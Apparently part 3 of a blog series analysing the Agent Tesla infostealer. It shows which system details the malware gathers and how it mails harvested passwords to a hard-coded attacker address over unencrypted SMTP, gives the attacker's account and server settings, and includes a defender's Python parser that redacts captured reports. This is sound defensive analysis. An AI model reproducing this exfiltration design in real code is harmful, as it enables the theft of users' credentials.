Unfolding Agent Tesla: The Art of Credentials Harvesting. Discovery & Exfiltration
Analysis of Agent Tesla, A Close Look at Password Theft Technique
Part 3: Discovery & Exfiltration
System Discovery
Agent Tesla adds the following system details to a list and prepares it for exfiltration.
It collects these details from the system using “vVwoRiXJKOu”, obtains the identifier “PW_Username_Desktopname” from rsrz(“PW”), and then merges the harvested passwords with this information.
- Time
- User Name
- Computer Name
- OSFullName
- CPU
- RAM
“Time: 01/03/2024 05:41:35<br>User Name: %username%<br>Computer Name: DESKTOP-002IHON<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: 12th Gen Intel(R) Core(TM) i7-12700KF<br>RAM: 8191.05 MB<br> <hr>Host: https://host.com/<br>Username: username<br>Password: pass<br>Application: Chrome<br><hr>Host: https://test.com/<br>Username: usernameoftest<br>Password: hyhello<br>Application: Chrome<br><hr>Host: https://outlook.com/<br>Username: user<br>Password: pass<br>Application: Edge Chromium<br><hr>Host: https://host.com/<br>Username: username<br>Password: pass<br>Application: Edge Chromium<br><hr>Host: https://test.com/<br>Username: usernameoftest<br>Password: hyhello<br>Application: Edge Chromium<br><hr>”
Exfiltration
It then prepares a mail object for sending the data to the attacker’s email address, which is hard-coded in the sample as {debramarett30@gmail.com}.
Next it sets the sender address, also taken from a hard-coded variable.
Then it sets the subject to the system identifier, PW_username/desktopname.
Then it sets the HTML body to the collected data: the system information followed by the harvested passwords.
Finally it initializes an SmtpClient, configures it with the following options, and sends the email to the attacker’s address:
- smtpClient.Host: “mail.elec-qatar.com”
- smtpClient.Credentials.Domain: “” (empty)
- smtpClient.Credentials.Password: *************
- smtpClient.Credentials.UserName: mohammed.abrar@elec-qatar.com
- smtpClient.Port: 0x0000024B (587)
- smtpClient.UseDefaultCredentials: false
- smtpClient.EnableSsl: false
- smtpClient.Server: mail.elec-qatar.com
Because EnableSsl is false, the .NET SmtpClient never negotiates STARTTLS, so the submission on port 587 travels in cleartext and the full report (system details and passwords) is visible to network monitoring.
After sending the email it disposes of the attachment to free memory and remove the loot from the system.
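The report format above (system block, then one `<hr>`-separated record per credential) is regular enough to parse. The following is an added example, not code from the article or the malware, that turns a captured Agent Tesla SMTP body into structured records so responders can list the affected hosts and applications without passing the plaintext passwords around; the sample body is constructed from the values shown in the article.

```python
from typing import Dict, List

# Constructed sample body, copied from the format shown in the analysis (placeholder values).
SAMPLE_BODY = (
    "Time: 01/03/2024 05:41:35<br>User Name: %username%<br>"
    "Computer Name: DESKTOP-002IHON<br>OSFullName: Microsoft Windows 10 Pro<br>"
    "CPU: 12th Gen Intel(R) Core(TM) i7-12700KF<br>RAM: 8191.05 MB<br> <hr>"
    "Host: https://host.com/<br>Username: username<br>Password: pass<br>Application: Chrome<br><hr>"
    "Host: https://test.com/<br>Username: usernameoftest<br>Password: hyhello<br>Application: Chrome<br><hr>"
    "Host: https://outlook.com/<br>Username: user<br>Password: pass<br>Application: Edge Chromium<br><hr>"
)


def _parse_block(block: str) -> Dict[str, str]:
    """Turn 'Key: value<br>Key: value<br>' into a dict (split on the first colon only,
    so URLs and timestamps keep their own colons)."""
    fields: Dict[str, str] = {}
    for line in block.split("<br>"):
        line = line.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        fields[key.strip()] = value.strip()
    return fields


def parse_exfil_body(body: str) -> Dict[str, object]:
    """Split the report into the system-info block and the credential records."""
    blocks = [b for b in body.split("<hr>") if b.strip()]
    system_info = _parse_block(blocks[0]) if blocks else {}
    creds = [_parse_block(b) for b in blocks[1:]]
    # Drop fragments that are not complete credential records.
    creds = [c for c in creds if {"Host", "Username", "Application"} <= c.keys()]
    return {"system": system_info, "credentials": creds}


def affected_hosts(body: str) -> List[str]:
    """Unique hosts whose credentials were stolen, for scoping password resets."""
    return sorted({c["Host"] for c in parse_exfil_body(body)["credentials"]})


def redacted_records(body: str) -> List[Dict[str, str]]:
    """Credential records with the password masked, safe to paste into a ticket."""
    out = []
    for c in parse_exfil_body(body)["credentials"]:
        out.append({**c, "Password": "<redacted>"})
    return out
```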
Parts
Part — 1 — Dropper Analysis
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-f1a988cfd137
Part — 2 — Browsers Stealing
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-2d565c68db0d
Part — 3 — Discovery & Exfiltration
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-7a77f69435ee
Part — 4 — Stealing FileZilla
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-d30da9c36988
Part — 5 — Stealing The BAT! EMAIL CLIENT
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-c3fe4854775b
Part — 6 — Stealing Outlook Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-de3737f9d66e
Part — 7 — Stealing Trillian Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-afa2dd6e9de7
Part — 8 — Stealing MailBird Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-e5501af1c942
Part — 9 — Stealing WinSCP Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-55e7b2c64d60
Part — 10 — Stealing Core FTP LE Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-cdce40f6a747
Part — 11 — Stealing WinSCP Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-db9bb6698041
Part — 12 — Stealing FTP Navigator Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-59818a3686a3
Part — 13 — Stealing FTP Commander Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-7d01a41d554b
Part — 14 — Stealing FTP Getter Credentials
https://osamaellahi.medium.com/unfolding-agent-tesla-the-art-of-credentials-harvesting-fe5ff29cc93c